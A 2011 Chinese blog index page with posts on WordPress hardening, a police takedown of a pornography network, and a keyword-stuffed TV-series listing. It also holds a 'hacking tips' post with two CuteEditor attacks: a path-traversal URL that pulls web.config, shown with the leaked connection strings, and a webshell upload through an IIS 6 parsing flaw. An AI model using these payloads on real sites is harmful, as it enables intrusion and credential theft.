博客安全系列之WordPress

作者:Secer 发布时间:August 26, 2011 分类:Web安全

最近WORDPRESS一直很不安全..0DAY漏洞经常有~所以就需要对程序进行安全设置
==========================================================
第一步:设置可执行。将wp-content,wp-includes,wp-admin/css.wp-admin/images,wp-admin /import,wp-admin/includes,wp-admin/js,wp-admin/maint
以上文件夹以及子目录设置PHP禁止直行
里面加个.htaccess即可
RewriteEngine on
RewriteRule .*.(php|PHP|php|Php|phP|PhP|PHp|pHP|pHp)$ /bad.txt
根目录建立个bad.txt 内容:请勿尝试非法入侵!
===========================================================
第二步:设置目录禁止写入删除,只允许wp-content\uploads的写入删除权限!以免拿到后台去拿SHELL
文件夹,右键,安全,WEBSERVER启动账户 只允许读取权限。。
===========================================================
第三步:修改后台登陆名。默认的是wp-login.php 改成@@@@HSDAeryte544.php.adfsdf.php之类的即可。一定记住!WP-ADMIN不能改~
这样即使你的密码是admin用户是admin也不能登陆你的后台啦~

如果你技术不是很好,你只要注意备份和更新就可以了,其他的可以参考参考。

cuteeditor编辑器利用方法两则

作者:Secer 发布时间:August 26, 2011 分类:黑客技巧

方法1.直接下载load.ashx配置文件
http://ha.cker.in/CuteSoft_Client/CuteEditor/Load.ashx?type=image&file=../../../web.config
然后查看一些sql配置信息 从sql数据库连接入手
<connectionStrings>
<add name="ynncConnectionString" connectionString="Server=.;DataBase=ynta; UID=sa;PWD="/>
<add name="strConn" connectionString="Server=.;DataBase=ynta; UID=sa;PWD="/>
</connectionStrings>
<location path="admin/images">
<system.web>
<authorization>
<allow users="?" roles="Admin,Manager,User"/>
</authorization>
</system.web>
</location>
<location path="admin">
<system.web>
<authorization>
<deny users="?" roles="Admin,Manager,User"/>
<allow users="*"/>
</authorization>
</system.web>
</location>
<location path="admin/YNTA_UpFile">
<system.web>
<authorization>
<allow users="?" roles="Admin,Manager,User"/>
</authorization>
</system.web>
</location>
<location path="admin/flv">
<system.web>
<authorization>
<allow users="?" roles="Admin,Manager,User"/>
</authorization>
</system.web>
</location>
方法2.2003 iis解析(后台拿webshell)
填加新闻–上传音乐,视频等图标—新建目录xx.asp 然后上传小马x.avi
图片方面因为格式检查严格~!不成功~求突破。

本文来自: 雪域博客

阳光娱乐联盟遭中美联合打击,最大中文淫秽色情网99情色网诱导性侵幼女犯罪

作者:Secer 发布时间:August 25, 2011 分类:絮叨碎语

  近日,公安部与美国警方联合摧毁在全球拥有1000多万名会员的最大中文淫秽色情网站联盟“阳光娱乐联盟”。该联盟建设者王勇及其核心成员被成功抓捕,联盟旗下淫秽色情网站已陆续关闭,境外最大淫秽色情源头被彻底打掉。该案是公安部与美国警方首次通过联合行动破获的跨国网络淫秽色情犯罪案件。
  据调查,2002年1月,中国福建出境人员王勇在美国建设了“99情色”网站,随后又通过加盟、收购等方式,将互联网上用户量最大的48家中文淫秽色情网站纳入其管理范围,形成全球最大的中文淫秽色情网站联盟“阳光娱乐联盟”。据统计,该联盟含淫秽色情信息版块千余个,淫秽色情信息上亿帖,其中有18个网站涉及儿童色情信息。这些网站不仅传播淫秽色情信息,而且还滋生了很多其他的犯罪,很多犯罪人员通过这些网站交流强奸猥亵幼女的作案手法、交换儿童色情图片,助长了性侵犯儿童犯罪,这些网站上还充斥着全国各地卖淫嫖娼信息,成为卖淫嫖娼的重要媒介。中国刑法第363条规定,以牟利为目的,制作、复制、出版、贩卖、传播淫秽物品,情节严重的,处十年以上有期徒刑或者无期徒刑。近年来,中国公安机关多次对 “阳光娱乐联盟”开展专项打击,累计打掉该联盟在境内发展的网站管理员、版主近千名,但由于该网站建设者及服务器均位于美国,致使该联盟没有被根本取缔。
  中国国务委员、公安部部长孟建柱对此案高度重视,要求进一步加强国际执法合作,坚决摧毁这一网络联盟,消除其社会危害。2010年4月,基于打击传播儿童色情犯罪的共识,公安部与美国联邦调查局就这起案件正式开展跨国警务合作。在公安部的统一协调指挥下,北京、安徽、福建三地公安机关迅速成立专案组,对该联盟在境内的组织体系开展调查。为尽快侦破此案、将犯罪嫌疑人缉拿归案,公安部还通过国际刑警组织发出红色通缉令,指示驻美使馆警务联络处与美方保持了密切沟通,并派遣警官小组赴美开展工作。美方也高度重视该案的侦查工作,专程派员来华与中方交换证据、研究联合行动方案。2011年6月23日,中美警方联合实施抓捕,美方抓获该联盟的建设者王勇,中方抓获在境内负责洗钱和维护网站的10余名犯罪嫌疑人,目前,该联盟相关淫秽色情网站已陆续被关闭。
  公安部有关负责人表示,作为中美执法合作联合联络小组打击网络犯罪工作组的一项重要成果,破获“阳光娱乐联盟”传播淫秽色情信息案是中美两国执法机关在打击网络犯罪领域的第一次成功的联合执法行动,对预防和打击跨国网络犯罪具有重大意义,也是公安部开展国际执法合作的又一成功案例。公安部将继续与各国加强国际执法合作,严厉打击跨国网络淫秽色情、诈骗、赌博、黑客攻击破坏等各种违法犯罪活动,切实维护网络安全,保障公民的合法权益。

新水浒传 新水浒传在线观看 新水浒传下载 新版水浒传 忠义水浒传 新版水浒传 忠义水浒传下载 新水浒传 忠义水浒传剧情全集 新水浒传86集 新水浒传完整 新水浒传全集下载(第1-86集大结局)

作者:Secer 发布时间:August 11, 2011 分类:影音娱乐

【别名】: 水浒传 水浒 新水浒
【导演】: 鞠觉亮
【主演】: 张涵予 李宗翰 胡东 吕良伟 严宽 张迪奇 杜淳 安以轩 甘婷婷 袁咏仪 何佳怡 刘筱筱 胡可 杨子 黄格选 熊欣欣 计春华 于承惠 柳海龙 宝力高 孙浩 傅艺伟 李子雄 薛中锐 张铁林
【制片国家/地区】: 中国内地
【类型】: 传记古装剧情历史
【语言】: 国语
【片长】: 45分钟/集
【上映日期】: 2010

阅读剩余部分...